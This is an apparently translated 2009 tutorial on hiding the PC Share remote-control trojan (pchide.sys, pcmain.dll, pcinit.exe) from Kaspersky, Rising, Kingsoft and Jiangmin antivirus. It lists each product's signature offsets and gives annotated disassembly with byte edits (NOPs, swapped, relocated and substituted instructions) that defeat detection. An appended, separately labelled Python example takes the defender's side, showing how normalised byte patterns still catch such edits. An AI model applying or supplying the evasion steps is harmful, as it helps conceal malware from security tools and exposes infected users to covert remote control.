PC Share Signature Locations and How to Modify Them


2009/2/21  Editor: Anonymous  Source: compiled by this site

1. Locating the signatures

Kaspersky:

pchide.sys:

[Signature] 00000986_00000001

pcmain.dll

[Signature] 0000BB02_00000001

pcinit.exe

[Signature] 00000825_00000001

[Signature] 00001369_00000001

Rising:

pchide.sys:

[Signature] 00000D56_00000001

pcmain.dll:

[Signature] 0000BB49_00000001

pcinit.exe

[Signature] 00000673_00000001

[Signature] 00000827_00000001

[Signature] 00000D5B_00000001

Kingsoft:

pchide.sys:

[Signature] 00000D3E_00000001

pcmain.dll:

Reverse:

[Signature] 0000BAB4_00000001

[Signature] 0000BABB_00000001

[Signature] 0000DE28_00000001

[Signature] 0000DE79_00000001

pcinit.exe:

[Signature] 00001238_00000001

[Signature] 00001265_00000001

Jiangmin:

pchide.sys:

[Signature] 00000DAF_00000001

pcmain.dll:

[Signature] 0000BB0A_00000001

pcinit.exe:

[Signature] 000008BC_00000001

[Signature] 00000EE4_00000001

[Signature] 000012BA_00000001

########################################################################################################################

2. Modifying the signatures:

//***********************************************************************************************************************

Kaspersky:

pchide.sys:

[Signature] 00000986_00000001

00010975:  FF15 20030100              CALL [10320]

0001097B:  33C0                       XOR EAX,EAX

0001097D:  EB 11                      JMP SHORT 00010990

0001097F:  50                         PUSH EAX

00010980:  33C0                       XOR EAX,EAX       //NOP this instruction out

00010982:  33C0                       XOR EAX,EAX

00010984:  0F84 03000000              JE 0001098D

0001098A:  55                         PUSH EBP

0001098B:  8211 58                    ADC BYTE PTR [ECX],58

//---------------------------------------------------------------------------------------------------------------------

pcmain.dll

[Signature] 0000BB02_00000001

1000BAF9:  EB 4E                      JMP SHORT 1000BB49

1000BAFB:  57                         PUSH EDI

1000BAFC:  56                         PUSH ESI

1000BAFD:  53                         PUSH EBX

1000BAFE:  E8 FDF8FFFF                CALL 1000B400     //2. Change 1000B400 to 1000B3F8

1000BB03:  83FE 01                    CMP ESI,1

1000B3F8                                                //1. Move the code at 1000B400 to here

1000B3FE:  90                         NOP

1000B3FF:  90                         NOP

1000B400:  8B4424 08                  MOV EAX,[ESP+8]

1000B404:  81EC 24050000              SUB ESP,524

1000B40A:  83F8 01                    CMP EAX,1

1000B40D:  56                         PUSH ESI

1000B40E:  57                         PUSH EDI

//---------------------------------------------------------------------------------------------------------------------

pcinit.exe

[Signature] 00000825_00000001  00401425

0040081D:  FFD6                       CALL NEAR ESI

0040081F:  6A 06                      PUSH 1            //

00400821:  58                         POP EAX

00400822:  5F                         POP EDI

00400823:  5E                         POP ESI

00400824:  5B                         POP EBX

00400825:  C9                         LEAVE

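[Signature] 00001369_00000001  00401F69

The call at this location leads into the routine shown below. Move the first four instructions of that routine to a blank area, then change the call's target address, and the file is no longer detected!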

00401429  /$  55                    push    ebp

0040142A  |.  8BEC                  mov     ebp, esp

0040142C  |.  81EC 00010000         sub     esp, 100

00401432  |.  80A5 00FFFFFF 00      and     byte ptr [ebp-100], 0

00401439  |.  56                    push    esi

0040143A  |.  57                    push    edi

55 8B EC 81 EC 00 01 00 00 80 A5 00 FF FF FF 00

00401FDB      00                    db      00

00401FDC      00                    db      00

//***********************************************************************************************************************

Rising:

pchide.sys:

[Signature] 00000D56_00000001

00010D4C:  6A 3B                      PUSH 3B

00010D4E:  59                         POP ECX

00010D4F:  33C0                       XOR EAX,EAX          //sub eax,eax

00010D51:  8DBD 02FEFFFF              LEA EDI,[EBP-1FE]

00010D57:  F3                         REP STOS DWORD PTR ES:[EDI]

//---------------------------------------------------------------------------------------------------------------------

pcmain.dll: (At the start of this block there is a jump to 1000BB49; NOP out the xor eax, eax in the instruction just before it and that is enough...)

[Signature] 0000BB49_00000001              1000C749

1000BB3A:  85C0                       TEST EAX,EAX

1000BB3C:  74 08                      JE SHORT 1000BB46

1000BB3E:  57                         PUSH EDI

1000BB3F:  56                         PUSH ESI

1000BB40:  53                         PUSH EBX

1000BB41:  FFD0                       CALL EAX

1000BB43:  8945 0C                    MOV [EBP+C],EAX

1000BB46:  8B45 0C                    MOV EAX,[EBP+C]

1000BB49:  5F                         POP EDI

1000BB4A:  5E                         POP ESI

//---------------------------------------------------------------------------------------------------------------------

pcinit.exe

[Signature] 00000673_00000001  00401273

00400664:  56                         PUSH ESI

00400665:  8B31                       MOV ESI, [DWORD DS:ECX]

00400667:  57                         PUSH EDI

00400668:  66:8B7C24 0C               MOV DI, [WORD SS:ESP+C]

0040066D:  66:893C96                  MOV [WORD DS:ESI+EDX*4], DI

00400671:  8B31                       MOV ESI, [DWORD DS:ECX]

00400673:  0FB710                     MOVZX EDX, [WORD DS:EAX]       //swap with the previous line

00400676:  66:8B7C24 10               MOV DI, [WORD SS:ESP+10]

[Signature] 00000827_00000001  00401427

0040081D:  FFD6                       CALL NEAR ESI

0040081F:  6A 06                      PUSH 6                   //already changed during the Kaspersky modification; originally: push 1

00400821:  58                         POP EAX

00400822:  5F                         POP EDI

00400823:  5E                         POP ESI

00400824:  5B                         POP EBX

00400825:  C9                         LEAVE

00400826:  C2 0C00                    RETN C

[Signature] 00000D5B_00000001  0040195B

00400D30:  FF15 34204000              CALL NEAR [DWORD DS:402034]

00400D36:  8BF8                       MOV EDI, EAX

00400D38:  897D EC                    MOV [DWORD SS:EBP-14], EDI

00400D3B:  FF15 38204000              CALL NEAR [DWORD DS:402038]

00400D41:  3D B7000000                CMP EAX, B7

00400D46:  0F84 E1020000              JE 0040102D

00400D4C:  68 30750000                PUSH 7530

00400D51:  57                         PUSH EDI

00400D52:  FF15 6C204000              CALL NEAR [DWORD DS:40206C]

00400D58:  85C0                       TEST EAX, EAX              //change to: and  eax,eax

//***********************************************************************************************************************

Kingsoft:

pchide.sys:

[Signature] 00000D3E_00000001

00010D2A:  73 00                      JNB     SHORT 00010D2C

00010D2C:  5C                         POP     ESP

00010D2D:  0000                       ADD     [EAX],AL

00010D2F:  0055 8B                    ADD     [EBP-75],DL

00010D32:  EC                         IN      AL,DX

00010D33:  81EC 18020000              SUB     ESP,218

00010D39:  56                         PUSH    ESI

00010D3A:  57                         PUSH    EDI

00010D3B:  BE 020D0100                MOV     ESI,10D02

00010D40:  8DBD F0FDFFFF              LEA     EDI,[EBP-210]   //swap with the previous line!

//---------------------------------------------------------------------------------------------------------------------

pcmain.dll:

Reverse:

[Signature] 0000BAB4_00000001

1000BAB3:  55                         PUSH EBP

1000BAB4:  8BEC                       MOV EBP,ESP  //swap with the line below, then add another 4 to the later EBP+8 and similar offsets

1000BAB6:  53                         PUSH EBX

1000BAB7:  8B5D 08                    MOV EBX,[EBP+8]

1000BABA:  56                         PUSH ESI

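[Signature] 0000BABB_00000001           //already changed with the previous one; they are together

[Signature] 0000DE28_00000001              //for these two, just changing the letter case is enough... (uppercase + 20h = lowercase)

[Signature] 0000DE79_00000001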

//---------------------------------------------------------------------------------------------------------------------

pcinit.exe:

[Signature] 00001238_00000001  00401E38

[Signature] 00001265_00000001  00401E65

00401259:  8965 E8                    MOV [EBP-18],ESP

0040125C:  33DB                       XOR EBX,EBX

0040125E:  895D FC                    MOV [EBP-4],EBX

00401261:  6A 02                      PUSH 2

00401263:  FF15 8C204000              CALL [40208C]

//***********************************************************************************************************************

Jiangmin:

pchide.sys:

[Signature] 00000DAF_00000001

00010D96:  59                         POP     ECX

00010D97:  59                         POP     ECX

00010D98:  8D85 F0FDFFFF              LEA     EAX,[EBP-210]

00010D9E:  50                         PUSH    EAX

00010D9F:  8D45 F8                    LEA     EAX,[EBP-8]

00010DA2:  50                         PUSH    EAX

00010DA3:  FF15 10030100              CALL    NEAR [10310]

00010DA9:  68 200F0100                PUSH    10F20

00010DAE:  8D85 F8FEFFFF              LEA     EAX,[EBP-108]     //swap this line with the line above

00010DB4:  50                         PUSH    EAX

//---------------------------------------------------------------------------------------------------------------------

pcmain.dll:

[Signature] 0000BB0A_00000001

1000BAF7:  90                         NOP

1000BAF8:  90                         NOP

1000BAF9:  EB 4E                      JMP SHORT 1000BB49

1000BAFB:  57                         PUSH EDI

1000BAFC:  56                         PUSH ESI

1000BAFD:  53                         PUSH EBX

1000BAFE:  E8 F5F8FFFF                CALL 1000B3F8

1000BB03:  83FE 01                    CMP ESI,1

1000BB06:  8945 0C                    MOV [EBP+C],EAX          //swap with the instruction above!

1000BB09:  75 0C                      JNZ SHORT 1000BB17

1000BB0B:  85C0                       TEST EAX,EAX

1000BB0D:  75 37                      JNZ SHORT 1000BB46

//---------------------------------------------------------------------------------------------------------------------

pcinit.exe:

[Signature] 000008BC_00000001  004014BC

[Signature] 00000EE4_00000001  00401AE4

00400EC3:  50                         PUSH EAX

00400EC4:  8D86 06080000              LEA EAX,[ESI+806]

00400ECA:  50                         PUSH EAX

00400ECB:  FFD3                       CALL EBX

00400ECD:  8D86 06080000              LEA EAX,[ESI+806]

00400ED3:  68 78304000                PUSH 403078

00400ED8:  50                         PUSH EAX

00400ED9:  FFD3                       CALL EBX

00400EDB:  8D8D 34FEFFFF              LEA ECX,[EBP-1CC]

00400EE1:  8D86 06090000              LEA EAX,[ESI+906]

00400EE7:  51                         PUSH ECX

00400EE8:  50                         PUSH EAX

[Signature] 000012BA_00000001  00401EBA         //relocate

00401EB8  |.  59                    pop     ecx

00401EB9  |>  E8 E2000000           call    00401FA0

00401EBE  |.  68 0C304000           push    0040300C

00401FA0  /$  68 00000300           push    30000                                     ; /CWmask = 30000

00401FA5  |.  68 00000100           push    10000                                     ; |CWnew = 10000

00401FAA  |.  E8 0D000000           call    <jmp.&MSVCRT._controlfp>                  ; \_controlfp

00401FAF  |.  59                    pop     ecx

00401FB0  |.  59                    pop     ecx

00401FB1  \.  C3                    retn

68 00 00 03 00 68 00 00 01 00

00401FF2      68 00000300           push    30000
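
Added example (not from the original article): a defender-side sketch of why fixed-offset, exact-byte signatures like those listed above stop matching after the equivalent-instruction edits the article describes, and how a pattern that treats equivalent encodings as one token keeps matching. The byte runs are copied from the listings at 00010D4C and 00400D4C; the filler bytes, the function names and the choice of equivalence classes are assumptions made for this example.

```python
import re

# Interchangeable two-byte x86 encodings with the same effect on EAX.
ZERO_EAX = [bytes.fromhex(h) for h in ("33c0", "31c0", "2bc0", "29c0")]  # xor/sub eax,eax
FLAGS_EAX = [bytes.fromhex(h) for h in ("85c0", "23c0", "21c0")]         # test/and eax,eax

def exact_hit(data, offset, expected):
    """Fixed-offset, exact-byte comparison (the brittle signature style)."""
    return data[offset:offset + len(expected)] == expected

def compile_sig(tokens):
    """tokens: bytes = literal run, list = any one of several equivalent encodings.
    Runs of NOP (0x90) are tolerated between tokens."""
    parts = []
    for tok in tokens:
        alts = [tok] if isinstance(tok, bytes) else tok
        parts.append(b"(?:" + b"|".join(re.escape(a) for a in alts) + b")")
    return re.compile(b"\x90*".join(parts), re.DOTALL)

def scan(data, sig):
    """Offset of the first match anywhere in data, or -1 if absent."""
    m = sig.search(data)
    return m.start() if m else -1

# Constructed samples: 16 filler bytes followed by byte runs copied from the listings.
PAD = b"\xcc" * 16
BLOCK_A = bytes.fromhex("6a3b5933c08dbd02fefffff3")            # listing at 00010D4C
ORIGINAL = PAD + BLOCK_A
SUBSTITUTED = PAD + bytes.fromhex("6a3b592bc08dbd02fefffff3")  # xor eax,eax -> sub eax,eax
SHIFTED = PAD + bytes.fromhex("906a3b599033c08dbd02fefffff3")  # NOP padding moves offsets
SIG_A = compile_sig([bytes.fromhex("6a3b59"), ZERO_EAX, bytes.fromhex("8dbd02fefffff3")])

BLOCK_B = bytes.fromhex("683075000057ff156c20400085c0")        # listing at 00400D4C
AND_VARIANT = PAD + BLOCK_B[:-2] + bytes.fromhex("23c0")       # test eax,eax -> and eax,eax
SIG_B = compile_sig([BLOCK_B[:-2], FLAGS_EAX])

if __name__ == "__main__":
    for name, data in (("original", ORIGINAL), ("substituted", SUBSTITUTED),
                       ("shifted", SHIFTED)):
        print(name, "exact:", exact_hit(data, 16, BLOCK_A),
              "normalized at:", scan(data, SIG_A))
    print("and-variant exact:", exact_hit(AND_VARIANT, 16, BLOCK_B),
          "normalized at:", scan(AND_VARIANT, SIG_B))
```

Byte-level normalization like this does not cover the reordered or relocated instructions shown above; those call for matching on disassembled instructions or on runtime behaviour.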
